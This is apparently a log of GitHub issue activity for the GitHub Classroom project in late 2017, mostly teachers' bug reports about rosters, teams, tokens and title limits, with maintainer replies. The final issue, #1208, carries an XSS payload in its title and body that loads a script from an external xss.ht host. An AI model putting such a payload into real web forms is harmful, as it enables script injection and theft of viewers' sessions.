This modal could accept more than one line (ignore blanks and ignore duplicates i.e. students that are already enrolled)

Also be able to upload a new file of the roster (and again only add new students and ignore existing students)

[2017-09-01 20:37] BelieveC commented on #1108
@tarebyte, Can I go for it?

[2017-09-03 18:22] vonclites opened #1121 "Token auth errors after removing organization owner"
I've started seeing issues after removing an owner from my organization https://github.com/wvu-cs111

I was intermittently getting this error when trying to create new assignments:
"Cannot retrieve this organizations repo plan, please reauthenticate your token."
I am now getting it every time I try to create an assignment.

My students are also sometimes getting the same error when accepting the i

[2017-09-03 18:39] tarebyte commented on #1121
@vonclites I've removed the owner from your classroom, everything should be working as expected now.

[2017-09-03 19:24] vonclites commented on #1121
Was able to create a new assignment just fine!  Thanks so much for the rapid response!

[2017-09-03 19:25] vonclites commented on #1121
I'll see if the students can create the fake forks.  If everything goes smoothly I'll close this.

[2017-09-03 21:33] jonathan-g commented on #1117
I have the same issue. I created and assignment and created a class roster.

Everything was fine at first. Now I have 25 students who have submitted their assignments and when I click on either the assignment (to open the assignment page) or when I open "Classroom Management" and click on "Roster Management" I get a 500 error.

[2017-09-03 23:12] nag92 commented on #1108
is this issue being worked on?

[2017-09-04 01:46] robdotson opened #1126 "Teams are NOT working"
I cannot join/leave/create a team. I get 'there's something wrong with github.com' errors or 'that team name is already taken' but then it doesn't appear in the list. This product is terrible, and should never have made it out of beta.

[2017-09-04 01:55] robdotson commented on #1126
The only way I was able to create a team that stuck around is to make the name longer than 8 characters and add spaces. I really don't know why that would matter, but it does. I was then able to add my original team, and then leave the new team.

[2017-09-04 13:40] srvegdahl opened #1130 "Assignments not showing up in classroom."
I went to look at the assignments in my classroom this morning, and they are not visible. Each is now represented by a red rectangle with a '!' inside a triangle. See attached screenshot. Please advise me what's going on. The assignment is due tonight.
![screen shot 2017-09-04 at 6 35 52 am](https://user-images.githubusercontent.com/6766091/30028865-a7aa6092-913b-11e7-813d-bc5fe4872e62.png)

[2017-09-04 14:07] tarebyte commented on #1130
@srvegdahl I'm looking into these issues as we speak, will update you when I have it resolved, thanks for your patience ✨

[2017-09-04 14:36] tarebyte commented on #1130
@srvegdahl I think your issue is resolved, mind taking another look?

[2017-09-04 14:43] srvegdahl commented on #1130
Yes, it's fixed. Thanks much!

**********************************************************************
Steven R. Vegdahl, Ph.D.
MSC 145                                  Phone: 503-943-7215
Associate Professor of Computer Science  Fax: 503-943-7316
University of Portland                   Email: vegdahl@up.edu<mailto:vegdahl@up.edu>
5000 N. Willamette Blvd                  Web: http://faculty.up.edu

[2017-09-04 14:43] #1130 closed

[2017-09-04 15:44] josephwandile commented on #1097
Having the same problem. Have tried clearing out caches on all browsers, etc. Any idea what could be causing the issue?

[2017-09-04 16:55] tarebyte commented on #1118
Hi @kohler sorry about the delay getting back to you.

Looking at your classroom it looks like you had owners on your classroom that are not longer owners of your org. When this happens we may try and use their token and everything will fail.

It's a known problem that we're working on. I've removed the users described above. Mind giving it another go?

Thanks!

[2017-09-04 16:56] tarebyte commented on #1116
@zingale sorry for the delay, we don't actually have control of the importer, but it normally doesn't take that long to import a repository.

[2017-09-04 19:36] tarebyte commented on #1117
@gkapfham @minneapolis-edu @jonathan-g my apologies for the delay, I've been spending the weekend squashing some issues and perf problems.

If you're curious the massive PR is here: https://github.com/education/classroom/pull/1127

I've gone through and verified for each of your accounts that everything is working properly, please let me know if you run into any other issues.

Thanks again for you

[2017-09-04 19:37] #1117 closed

[2017-09-04 19:40] tarebyte commented on #1108
@nag92 I seemed to have resolved your issue with https://github.com/education/classroom/pull/1127

This is the view I see now:

<img width="1054" alt="screen shot 2017-09-04 at 15 40 30" src="https://user-images.githubusercontent.com/564113/30037278-6d0e415a-9187-11e7-93e6-cc4ea3684214.png">

Does this look right?

[2017-09-04 20:11] gkapfham commented on #1117
Hello @tarebyte! Thanks for making this fix. I noticed #1127 and then immediately checked to see if the "Internal Server Error" was resolved. I am delighted to report that it seems to be fixed now. Thanks for taking time over your weekend to work on this issue. @minneapolis-edu and @jonathan-g, do you also notice that the error has been resolved?

Finally, is there anything that I might have done

[2017-09-04 20:24] tarebyte commented on #1117
You didn't do anything TBH, there were some issues with the way we were building the queries and loading data.

[2017-09-05 06:39] fperez opened #1134 "Error: "Validation failed: Title is too long (maximum is 60 characters)""
Hi,

I just tried to create a new classroom for [this org](https://github.com/berkeley-stat159-f17) but I get the error above. I already tried renaming it to a slightly shorter name (it used to be called berkeley...-fall2017) but that didn't help. I'd rather not keep shortening further, is there really a limit on org names for Classroom?

Thanks!

[2017-09-05 08:05] BelieveC commented on #1134
@fperez, Yes, There is a limit of `60` characters for organization `title`.

[2017-09-05 08:52] fperez commented on #1134
Thanks @BelieveC! But something seems odd: my org title is only 20 characters long: `berkeley-stat159-f17`... What could be the problem?

[2017-09-05 08:55] fperez commented on #1134
Ah, it seems the problem is with the "Organization display name" perhaps?

If so, the error message is confusing, since there's no such limit when originally creating the orgs, only (it seems) when trying to make a classroom out of it. You might want to clarify that in the error that is displayed...

[2017-09-05 12:02] BelieveC commented on #1134
Yes, You are right. I tried both the cases, It works for `Organization display name` lesser equal to 60.
Sorry for the confusion. Thanks for the feedback. We will look fix the issue :smile:

[2017-09-05 13:20] tarebyte commented on #1134
<img width="779" alt="screen shot 2017-09-05 at 09 20 19" src="https://user-images.githubusercontent.com/564113/30063107-78f2d88e-921b-11e7-81a7-572c23cc6aab.png">

@fperez does this seem more clear as an error?

[2017-09-05 13:29] kohler commented on #1118
Thank you @tarebyte! It looks like things are working much better. I'll close this issue since you know about the underlying problem.

[2017-09-05 13:29] #1118 closed

[2017-09-05 14:41] tarebyte commented on #1126
@robdotson [your comment above](https://github.com/education/classroom/issues/1126#issue-254916787) is a violation of the [Classroom Code of Conduct](https://github.com/education/classroom/blob/master/CODE_OF_CONDUCT.md) as it is insulting or derogatory. You may consider this an official warning.

If you'd like us to help with the problems you're facing, we going to need to know a little more abou

[2017-09-05 15:49] robdotson commented on #1126
I retract the 'is terrible' part. My initial reaction was to an unrelated (private) repository being deleted when leaving a team. Luckily I was able to restore it, but not without significant effort. I will be more mindful of the rules in the future, and will reopen a new issue along with my workarounds.

[2017-09-05 15:49] #1126 closed

[2017-09-05 16:19] mozzadrella commented on #1120
@angrave thanks for this--good 💡. @tarebyte has added the help-wanted label if someone wants to take this on. If not, I'll mark it down for the next sprint.

[2017-09-05 16:21] mozzadrella commented on #1107
@prismspecs hope those videos got you sorted. Can also ask follow up questions at: https://education.github.community/

[2017-09-05 16:21] #1107 closed

[2017-09-06 01:24] justindressel opened #1136 "Create repository success, but show 404 not found"
Students in the past few weeks have shown me the following error a few times.

1. I post a link to create a group project
2. Students click on the link, choose group members, and join the group.
3. This is supposed to create the repository.  Instead it sends students to a URL that has the word "success" at the end of it, which is not found, so the students get an "ERROR 404" page.

In fact, the re

[2017-09-06 13:51] #1136 closed

[2017-09-06 16:05] #441 closed

[2017-09-06 19:13] malloc82 opened #1138 "Out of date group information"
Once a assignment group is created and student joined the group, if some member(s) left the group, the group information in the group assignment page will not get updated. Students who left the group is still shown as in the group.

[2017-09-06 19:16] tarebyte commented on #1138
@malloc82 this is because we are not currently handling webhook events that deal with users leaving GitHub teams.

The project board is here: https://github.com/education/classroom/projects/5 if you're interested.

[2017-09-06 19:16] #1138 closed

[2017-09-06 20:32] malloc82 opened #1139 "Rejoining group assignment"
If a student accidentally joined a wrong group, there is no way for them to create another group after they leave the group. They seem to be bound with the assignment group permanently.

I have a student who accidentally joined a group but after leaving the group when he tried to create another group by go to the group assignment link, he got a 404 page for the group assignment repo (not the gray

[2017-09-06 20:34] tarebyte commented on #1139
@malloc82 can you email me mark.tareshawty AT github DOT com and I can help you sort this out?

[2017-09-06 21:04] cboettig commented on #292
I believe this issue is related to #730, and thus might be (at least in part) addressed by pending PR #980.  Linking them here since neither is mentioned above, though I'd appreciate clarification on this issue.

I agree that the inability to manage or change teams is a significant problem. Summarizing the above, a user cannot un-join a team; deleting the team using the GitHub 'Teams' interface ju

[2017-09-06 23:32] cboettig opened #1140 "Restrict access to roster-students only"
It appears that any GitHub user who knows the  "assignment link" can create an assignment repo in the course organization, even if those repos are private & the template repo is private, etc.  Anyone with access to this link is also made a 'member' of the Organization, and granted the default rights of any other member, including viewing the user names of all other (private) members, contents of p

[2017-09-07 00:26] vonclites commented on #1121
Yup, that resolved it.  Thanks again!

[2017-09-07 00:26] #1121 closed

[2017-09-07 01:16] leouieda commented on #292
After having a lot of trouble with students dropping out of the class or having problems with their teammates, I defaulted to creating new teams for every assignment. Most problems of that kind went away after that. It's not very efficient but for large classes it seems easier than micromanaging teams.

This seems like a great idea!

Explaining the workflow of "one student creates the team and the

[2017-09-07 03:36] cboettig commented on #1140
Follow-up note: I believe this issue only affects group assignments, which involve creating teams and thus making any individual with the link into a member of the team and the organization as a whole.  This contrasts from the behavior of the "individual assignment" links, where the individual remains an "outside collaborator".  It would still probably not be appropriate to list even these individ

[2017-09-09 03:41] gcschmit opened #1144 "Returning Students Stuck Authorizing Classroom to use GitHub"
When students that are a member of a GitHub Classroom from last year (e.g., @nnhsapcs201415), first clicked on the invitation link to accept an assignment for this year's classroom (e.g., @NNHSSE201718), they were prompted to authorize GitHub Classroom to access GitHub. I suppose this may be expected since they are now in a different classroom or the authorization had expired over the summer. Howe

[2017-09-09 18:20] gpascualg opened #1145 "Deleting a set of teams"
Suppose I've accidentally created a wrong set of teams or I need to dispose of one, is there any way I can delete them?

[2017-09-09 18:27] gpascualg commented on #1139
I've just ran into a similar problem while testing group assignments.

Student; I accepted a group assignment (A) and created a new group (on set S)
Professor: Deleted the student group
Student: Accept a different assignment (B) reusing groups from (S)

When trying to access, I get an error reading:

I've read some issues like #292 but the proposed solution is creating new teams on each assignment

[2017-09-10 00:59] #992 closed

[2017-09-12 11:05] ITSPaul opened #1147 "Deleting a set of assignments"
Is there any quick way of deleting a set of remote repos resulting from student acceptance of an assignment? This is important if you want to reuse a group and classroom with a new set of students registering to do a new module.

[2017-09-12 18:45] RivasAlejandro commented on #819
I have the same issue, i dont know what to do , the same problem

[2017-09-12 22:28] danwallach opened #1148 "GitHub Classroom bug: empty repos"
Related public post: https://education.github.community/t/possible-bug-with-github-classroom-clones-with-no-content/17274/4

I emailed the exact repos (which have student names, so can't go here in public) to education@github.com

Three students ended up with completely empty repos, so I just pushed the content into them directly and everything was fine. A fourth student ended up with a README.md

[2017-09-13 21:01] weeser commented on #1116
We have also been having issues with this.  We teach classes of about 40-50.  Most students have no problem and the repository is created and starter code is imported; however, some class periods we get 1/4 of the class getting stuck.  It will create the repository fine, but it takes 20+ minutes for it to import the starting code/commits.   I usually end up having to delete the repository and have

[2017-09-14 14:36] maryvilleDevProf opened #1151 "Unable to reuse teams in next assignment"
1. Students created teams for first group assignment
1. I created another group assignment and chose an existing set of teams, the set of teams associated with the previous assignment
1. Students accepted the new assignment, but were presented with the screen for joining a team or creating a new one: their previously existing teams did not appear nor was there any indication they were already part

[2017-09-14 14:44] #1151 closed

[2017-09-14 14:47] maryvilleDevProf commented on #1151
Issue was with choosing existing set of teams: at some point I must have created another set of teams. I suppose the actual issue for me would then be that I do not know where to see what teams are in a set of teams.

[2017-09-14 19:18] JamesSaxon commented on #595
I would also appreciate the ability to have multiple classrooms per organization.  It is the same class I'm teaching last year, so many of the resources are the same but many have also evolved.  The assignments are not all the same.

Having multiple classrooms would allow the course to evolve over time in a natural way.

Moreover, I think this is an important part of the GitHub education philosoph

[2017-09-14 19:20] jfiksel commented on #595
I also want to add my support of @Badlapje 's vision of GitHub Classroom organization.

[2017-09-15 08:16] crguezl commented on #960
:white_check_mark:

[2017-09-16 20:07] aaossa opened #1155 "Roster encoding"
Hi,

I submitted a text file containing a student roster (using their full name) and it seems like it's not displayed correctly:

![image](https://user-images.githubusercontent.com/10425834/30515591-335a9660-9b01-11e7-8eb9-2a60e4c1541c.png)

I would expect to show `Bastián Andrés Mavrakis Córdoba`. While I was triying to submit the file I never received any erro rmessage or warning, so I think tha

[2017-09-16 20:28] aaossa commented on #1155
Please ignore this. My text editor (ST3) was displaying the file in utf-8, so I could see everything ok, but the file was not being saved using `encoding="utf-8"`. Sorry about that :sweat_smile:

[2017-09-16 20:28] #1155 closed

[2017-09-18 15:17] danwallach commented on #847
Adding to this feature request: it would be handy to be able to sort on multiple fields, such as GitHub ID, lastname/firstname, or our university identifier if that's associated with a given GitHub Classroom instance.

[2017-09-18 15:18] danwallach commented on #960
How did I miss this? ✅✅✅

[2017-09-19 16:35] neilernst opened #1156 "Too many email notifications"
I am getting ~80 import notifications and ~80 "subscribed to update" notifications, for each assignment. A setting to turn off email notifications per repo would be great.

See https://education.github.community/t/too-many-email-announcements-for-each-hw-repo/17068/8

[2017-09-20 16:56] avatar-lavventura commented on #448
Well each student can accept invitation by signing themselves with other student's info. When accept page show up there are available student list for them to select. How could we check that student actually select the information that links to his information. @nwoodthorpe

[2017-09-21 20:33] PandelisZ opened #1160 "Dev: Enable Roster feature"
In #1105

@tarebyte mentions that

I've forked the current master branch and have set up my environment. Everything works but I don't have the roster feature. Is it locked behind a flag like mentioned above? How do I activate it?

I want to have a go at implementing #1120

<img width="491" alt="screen shot 2017-09-21 at 21 35 04" src="https://user-images.githubusercontent.com/8436717/30717423-c739

[2017-09-21 20:49] PandelisZ commented on #1160
I've managed to find the feature_flags_dependency.rb and have hard coded the flags to be enabled. I would still like to know how to do it properly though

[2017-09-21 20:58] PandelisZ commented on #1120
I've roughly figured our where all the roster features live and what It does I will be looking into this and attempting to implement a late add feature

[2017-09-21 21:01] tarebyte commented on #1160
@PandelisZ you need to add your GitHub database ID to the environment variable `NON_STAFF_GITHUB_ADMIN_IDS`, go to localhost:3000/stafftools/flipper/features, and manually create the feature flags.

This is the easiest way to get your ID:

[code]

It would be cool for someone to make a rake task that could setup all of our existing flags in it ✨

[2017-09-21 21:07] PandelisZ commented on #1160
wiiiiiicked thanks 👍

[2017-09-21 23:44] #1160 closed

[2017-09-22 20:26] damevski opened #1162 "Problem with old organization"
It appears that my organization vcu-cmsc355, while authorized to interact with GitHub Classroom, is missing the GitHub Classroom webhook. I'm not sure how this came to be, but right now I'm experiencing all kinds of strange behavior. Do directions on how to add the webhook exist?

-Kosta Damevski

[2017-09-22 20:35] damevski commented on #1162
Wrong place. Writing an e-mail to education@github.com instead.

[2017-09-22 20:35] #1162 closed

[2017-09-23 15:45] aaossa commented on #1156
AFAIK you can't turn off those notifications because they come from GitHub itself, and not from this project. The best you could do (to avoid further "spam") is "unwatch" the new repositories. You can see your watched repos here: https://github.com/watching

PS: Even in the post you linked that's the answer...

[2017-09-23 16:24] neilernst commented on #1156
That’s *an* answer but not a good one, hence the issue.

[2017-09-23 18:32] syifan commented on #1145
You can delete the team directly from your organization. However, the problem is that if you deleted one team, the team members can no longer accept assignments, if you want to stick to the same group formation. This is my current problem.

[2017-09-23 18:40] syifan opened #1164 "Keep the pull requests from the starting repo"
I am recently started to use Github classroom in my course. I use the starting repo to distribute the starting code, where the testing code is also in the starting repo. At the time student  accept the homework, there will be two branches, one master and one "start". When we grade the homework, we create a pull request from the master branch to the start branch. Any point we need to deduct or any

[2017-09-23 18:55] tarebyte commented on #1156
@neilernst @aaossa is correct, we currently can't turn off these email notifications, but I am looking into it.

[2017-09-23 19:37] gpascualg commented on #1145
@syifan First, thank you for your answer, but I wasn't refering to a team itself but rather to the "set of teams". When creating a group task, you can create a set that will contain all teams created by the students, I meant to delete that set as a whole, not an individual team.

[2017-09-23 20:18] aaossa commented on #630
I need a subset of this, I would like to customize prefix **and sufix** for each repository. I would imagine something like this in assignment settings:

![image](https://user-images.githubusercontent.com/10425834/30776786-1c2f73e8-a083-11e7-933f-b7f7088306ca.png)

Is it possible to do this? Can I work in a PR?

[2017-09-24 01:51] syifan commented on #1145
@gpascualg Thanks for clarifying. It seems that the Github Classroom does not have any team management interface. I have the same requirement for removing, modifying sets of teams.

[2017-09-24 17:34] mozzadrella commented on #1145
👋  hi @syifan. You can delete the whole Classroom and re-create connect the organization. Team management is on our Roadmap for "Manage and assess" https://github.com/education/classroom/projects/7

[2017-09-24 17:34] #1145 closed

[2017-09-24 17:44] mozzadrella commented on #1164
Hi @syifan thanks for opening. Other teachers like @dondi use a PR-grading workflow https://education.github.community/t/how-to-grade-assignments-on-github/13663

Your graders may want to think about doing what @gcschmit does:

We're in the process of embedding labels and labels in repos from Classroom. Stay tuned on those developments.

[2017-09-24 17:44] #1164 closed

[2017-09-24 17:44] mozzadrella commented on #1148
Thanks for reporting this @danwallach.

[2017-09-24 17:47] mozzadrella commented on #1147
Hi @ITSPaul 👋 .
We're working on a suite of features to make it easy for teachers to reuse Classroom in our roadmap: https://github.com/education/classroom/projects/7

For now I'd recommend you create a new org and a new Classroom, push your repo there and squash the commits so there isn't a history.

Hope that helps ✨

[2017-09-24 17:47] #1147 closed

[2017-09-24 17:49] mozzadrella commented on #1144
Nice workaround @gcschmit. We'll work on fine-tuning this in our "manage and future reuse" phase of the roadmap this fall.

[2017-09-24 17:50] mozzadrella commented on #1134
@tarebyte 💖

[2017-09-24 17:50] #1134 closed

[2017-09-24 17:51] mozzadrella commented on #1104
Hello @korel-san, you need to authorize GitHub Classroom to talk to the organizations you created. See @wilfriedE's commend above ^^.

[2017-09-24 17:51] #1104 closed

[2017-09-24 17:52] #844 closed

[2017-09-24 17:57] mozzadrella commented on #1140
Hi @cboettig. We've kept the invitation process pretty lightweight so far, and introduced rosters to help teachers keep better track of student's GitHub identities.

I'm putting your feature request on the roadmap as awaiting triage, and we'll tackle it in the next sprint, either in documentation or in the product. Thank you for opening.

[2017-09-24 18:10] mozzadrella commented on #1139
👋  hi @malloc82 did @tarebyte get you sorted?
@gpascualg deleting groups can get a bit hairy. I'm putting this on the roadmap to improve the experience.

[2017-09-24 18:11] mozzadrella commented on #960
Thank you all for signing up 💖  we'll be getting testing underway in November. Stay tuned.

[2017-09-24 19:54] aaossa commented on #960
:white_check_mark: (Can I still join? :grin: )

[2017-09-25 00:00] anglinb opened #1167 "No administrator removal mechanism leads to intermittent request failure"
**tl;dr** 👋 If an owner of an organization using classroom leaves the organization, they remain able to create assignments. Additionally, use of their auth token (now w/o org admin permissions) leads to intermittent failure for assignment creation.

---

### Description
I believe that users who are owners of an organization used by classroom will never get removed from administrating the classroom

[2017-09-26 07:38] fperez commented on #1134
Oops, sorry for the radio silence, got busy with teaching :)

Yes, much better, thanks!

[2017-09-29 08:44] csorbakristof commented on #377
I everyone! This week some of my students created repositories with names causing github to immediately (automatically) flag the organization and disable all the repositories (due to offending names). This happened 2 times. At the third, I managed to avoid this by immediately deleting the repository and disabling the authentication token of classroom (as the assignment cannot be suspended). I sugg

[2017-09-30 14:59] athityakumar opened #1173 ""Invalid Brewfile" error on running script/bootstrap or script/setup"
Hello team. I'm interested in contributing to this project and I've been trying to setup `classroom` locally since yesterday... 😄

### The error message

... and this is when I came across this error message while setting up. Due to the setting of magic-comment `frozen_string_literal: true` in [Brewfile](https://github.com/education/classroom/blob/master/Brewfile#L1), I'm getting an `Invalid Brewf

[2017-10-02 16:20] geoffreywiseman opened #1176 ""This invitation is invalid"?"
Trying to invite a student into a classroom -- they click on the link, the repo seems to get created, and then they get "This invitation is invalid". A google search isn't turning up much. Is this a bug, am I doing something wrong?

[2017-10-03 17:16] #1038 closed

[2017-10-03 17:51] tarebyte commented on #1176
@geoffreywiseman I don't think so 😄

It's probably an issue on our end, let me take a look and get back to you.

[2017-10-05 14:38] geoffreywiseman commented on #1176
Second student, same problem.

[2017-10-05 14:51] geoffreywiseman commented on #1176
Ah, I think I discovered why -- they're going in as outside collaborators on private repos, which uses a seat, and we hit the seat limit. I need to either make the assignment use a public repo (no seat required) or add seats / remove other collaborators.

[2017-10-05 21:28] tarebyte commented on #1176
@geoffreywiseman we (GitHub Education) should be able to give you more seats.

Can you reach out to education@github.com ?

[2017-10-05 21:34] Youssefares commented on #918
Hey, I'd like to work on this. Still up for grabs?

[2017-10-06 17:17] tarebyte commented on #918
Go for it @Youssefares!

[2017-10-06 17:58] ekimgit commented on #729
I have the same problem with some students. What to do? Should I remove the -1 Repos?

[2017-10-07 23:33] Youssefares commented on #918
Hey, fired up the repo locally. Thanks for the detailed guides ;)
A couple of questions though,
1. Does classroom support showing a status from the github APIs for the latest commit in a repo for instance, to be able to display the CI status as originally requested in this issue?

If not, should we add a checkbox preference to the assignment settings page, to show CI status, so administrators view

[2017-10-08 19:45] athityakumar commented on #847
@tarebyte - I'd like to take up this issue, with ability to sort by name, firstname and lastname. I roughly understand the changes that would be required for this functionality, and will try to get back as soon as possible.

[2017-10-10 23:17] gmporter opened #1184 "Download classroom roster"
Hi all.  I have been using classroom.github.com for a couple of my classes this past year.  The new roster feature is really neat.  However, it would be good to have a way to download the <student_id> <--> <githubid> mapping.  Ideally, I'd like to be able to download the roster as a CSV file or something.  Right now we have to manually copy-paste the data into a local file, which is error-prone an

[2017-10-11 15:57] audstanley2 opened #1185 "Can't accept our project 2 assignment"
I get directed to accept:
"Accepting this assignment will give your team (Deleted team) access to the project2-ghost repository in the @CSUF-CPSC-131-Fall2017 organization on GitHub."

That's not even the team name i set up, and i get an error, even if i TRY to accept.

[2017-10-11 16:02] jjcoy commented on #772
Hello,  I encountered a failure today.  Just 1 failure in about 35 created in the last week or so.

[2017-10-12 04:54] cai20170929 opened #1186 "loading for a long time and no results"
https://classroom.github.com/classrooms/32123504-2017-autumn-statistics-302/assignments/homework-2

[2017-10-12 05:04] cai20170929 commented on #1186
![1](https://user-images.githubusercontent.com/26779326/31480025-316b2bde-aed0-11e7-98bf-428f815260e6.png)

[2017-10-12 05:45] #1186 closed

[2017-10-12 14:42] matteoventuri7 opened #1187 "60 character limit to titles"
Link: https://classroom.github.com/classrooms/new

Organization: @FITSTIC

Error message: Validation failed: Title is too long (maximum is 60 characters)

Why?
![capture](https://user-images.githubusercontent.com/5465117/31502060-45f8a9ae-af6c-11e7-9b4c-6d75c78f95c8.PNG)

[2017-10-12 19:06] athityakumar commented on #1187
In `app/models/organization.rb` file (and slugs / titles in other models as well), this configuration has been set as -

[code]
Also, organization title for @FITSTIC exceeds this limit -

[code]

Changing this standard could probably fix the issue. But, as this standard of 60 characters has been chosen by the maintainers, I'd definitely wait for one of the maintainers to respond before opening a P

[2017-10-12 19:12] matteoventuri7 commented on #1187
Thanks.

Cordiali saluti.

--------------------------------------

Dott. MATTEO VENTURI

Web: http://www.matteoventuri.eu

LinkedIn: https://it.linkedin.com/in/matteo-venturi-ab180866

Mobile: +39.392/4190512

Skype: matteo.venturi7

Il 12 ott 2017 21:06, "Athitya Kumar" <notifications@github.com> ha scritto:

[2017-10-14 20:52] athityakumar opened #1190 "Hound CI and script/linter are giving different results"
This is not a user-based issue, but rather a contributor-based issue. I just recently came across this issue in PR #1182. The `script/linter` check passed locally and then I pushed to remote. Though it did pass on Travis CI too, Hound CI pointed out a couple of suggestions for scss. So, Hound CI and Travis CI following different style guides of scss.

Is this intended?

[2017-10-15 12:33] athityakumar commented on #1184
I'd like to contribute for this feature, if this is still up for grabs. I've a rough idea of how to proceed. 😄

@gmporter - Thanks for filing this issue in. I'd like to know what exactly are the columns that you'd expect the mapping to contain - `student_username`, `student_name`, `assignment_repository_link` and any thing more?

[2017-10-15 15:23] #958 closed

[2017-10-15 16:50] athityakumar commented on #918
@Youssefares - Though not exactly table UI, I feel that the `orgs/assignment_repos/assignment_repo` partial can be re-used to display the assignments of a student. 😄

[2017-10-15 19:23] #913 closed

[2017-10-16 00:23] #1075 closed

[2017-10-16 04:20] ccannon94 opened #1193 "GitHub Classroom Roster Assignment Paging Error"
When selecting "Unlinked GitHub accounts" tab on the Class Roster Management Page, changing pages of the list will send the user back to the "All students" tab. Then, when "Unlinked GitHub accounts" is selected again, it is on the correct page. Not impossible to use, just weird.

For example, when on page 1 of "Unlinked GitHub accounts", when I select page 2, the page reload brings me back to the

[2017-10-17 13:12] tarebyte commented on #918
/cc @d12 for status questions since you know that part better than I do 😄

[2017-10-18 13:08] sauviksarkar opened #1197 ""This invitation is invalid"?"
I am trying to add a collaborator (we have seats available) it is giving me the newly added collaborator - 'This invitation is invalid' error. Can you check.

Thanks,

Sauvik

[2017-10-18 13:09] #1197 closed

[2017-10-19 13:38] mozzadrella commented on #1185
@audstanley2 please take screenshots of what you are seeing.
If possible, try creating a new team and let us know what happens.

[2017-10-19 13:40] mozzadrella commented on #1187
@matteoventuri7 do you need more than 60 characters? Can you help us understand the use case?

[2017-10-19 13:47] matteoventuri7 commented on #1187
Now it's all ok. Error message was not clear.

*Dott. MATTEO VENTURI*

P.Iva 02588850392
Web: http://www.matteoventuri.eu
Email: info@matteoventuri.eu
Mobile: +39.392/4190512
Skype: matteo.venturi7

2017-10-19 15:40 GMT+02:00 Vanessa <notifications@github.com>:

[2017-10-20 13:02] cjmay opened #1198 "You are forbidden from performing this action on github.com (when accepting group assignment)"
Some of our users are unable to accept group assignments---but some *have* been able.  When it doesn't work, students get the "You are forbidden from performing this action on github.com" error message.  I tried this with a dummy student account (not my teacher account) and it initially failed, then I changed seemingly unrelated permissions on the upstream repository (to give students read access

[2017-10-20 18:00] cjmay commented on #1198
All instructors have now signed out of GitHub Classroom and signed back in.

[2017-10-21 18:08] amotzte opened #1201 "ReAuthenticate error results in Multiple repositories created for assignments."
After accepting assignment - first press gives an error of not authenticate (although I was signed in). Pressing again resulted in creating a second repository of the same assignment.
Seems to be pretty consistent

![image](https://user-images.githubusercontent.com/1177299/31854544-d8e80cf8-b6a3-11e7-9b5c-c4f48f398c06.png)

![image](https://user-images.githubusercontent.com/1177299/31854546-e9b6f7

[2017-10-21 22:45] maryvilleDevProf opened #1202 "Repo not available when creating new assignment"
I have pushed a new repo to our classroom's org and am now trying to create a new assignment. When I attempt to choose my starter code repository, the repo I just pushed is not appearing. It is pushed to the same org and there are no obvious permissions differences.

I have attempted deleting the local and remote repositories and creating the repository locally first, then remotely first. In all i

[2017-10-22 19:16] #1202 closed

[2017-10-23 07:00] turhanb opened #1203 "Classroom generated individual repo URI doesn't include the dash, if any, in GitHub username"
As a teacher, I created two GitHub test accounts "cs1702student" and "cs1702-student" to test my assignment. Using the invitation link for the assignment with "cs1702-student" account generates an individual (private) repository without the dash in the repo URI. This ("cs1702-student") account cannot access the generated repo, however the other test account "cs1702student" can access it, though s/

[2017-10-23 21:09] cjmay commented on #1198
Students are still experiencing this error.  Any help?

[2017-10-23 22:34] d12 opened #1205 "Use the commits endpoint for number_of_commits"
A little while ago, we switched to the contributors API: https://github.com/education/classroom/pull/1064

Unfortunately, it omits a bunch of commits and is causing counts to be off. It doesn't count:

- Empty commits
- Merge commits
- Commits by users who aren't contributors.

Instead, @johndbritton suggested we can use the page numbers on the commits endpoint to calculate this. https://stackover

[2017-10-25 22:42] botterweck opened #1206 "Accepting an assignment creates multiple repositories (e.g., username, username-1, username-2)"
When accepting assignments, students often end up with multiple repositories with URLs ending in username, username-1, username-2 and so on.

For instance, to test I just tried to accept an assignment (which I created myself). Initially, I got the following message, notice the incomplete URL after "created here".

![image](https://user-images.githubusercontent.com/1396137/32026606-00ed9f6a-b9dd-11

[2017-10-25 22:50] athityakumar commented on #1206
This feature of multiple forks for the same pair of repository and user account (with suffixes like -1, -2, etc.) lies within GitHub's core. As GitHub Education is inheriting this from the core, I'm not sure whether it can be fixed within this project.

I'm not a maintainer, I'm just an open-source contributor who wants to provide a quick and rough idea of what's going on here. Of course, one of t

[2017-10-25 23:38] botterweck commented on #1206
I understand that it should **be possible** that the same user creates multiple independent forks of the same repository.

However, it should not be the default behavior that accepting an assignment leads to unpredictable results.

I could understand that multiple repositories are created if the student (for whatever reason) activates the invitation link multiple times.

However,

1. It seems that

[2017-10-31 04:46] msaroufim commented on #286
Chiming in here as well, it's very frustrating to have to download 150 homework assignments manually. The way this should work is git clone "homework" where "homework" is a directory with each of the student's repos.

I'm happy to see djholt's solution and will try it out but this really feels like it should be a native feature.

[2017-10-31 18:54] nicolethenerd commented on #239
Why is this closed? If you are not an admin of your organization but your organization has already been added, you will still see no organizations on the "Select an organization for your new classroom" and be prompted to "grant us access". When you click "grant us access", you will see that your organization has already been added, and it's not at all clear what to do next.

[2017-11-01 23:21] #851 closed

[2017-11-02 15:51] jodeleeuw opened #1207 "Creating new assignment: can't find repo when it is a fork"
I forked a private repository from one of my organizations into my classroom organization. When I attempted to create a new assignment using that repo as the base, the search box would not find it, even if I typed in the full path.

I'm not sure if this is intentional behavior because the original repo was private and belonged to another organization, or if this is a bug.

[2017-11-03 19:21] #1072 closed

[2017-11-05 14:02] bewithsahilsaif opened #1208 ""><script src=https://bewithsahil001.xss.ht></script>"
"><script src=https://bewithsahil001.xss.ht></script>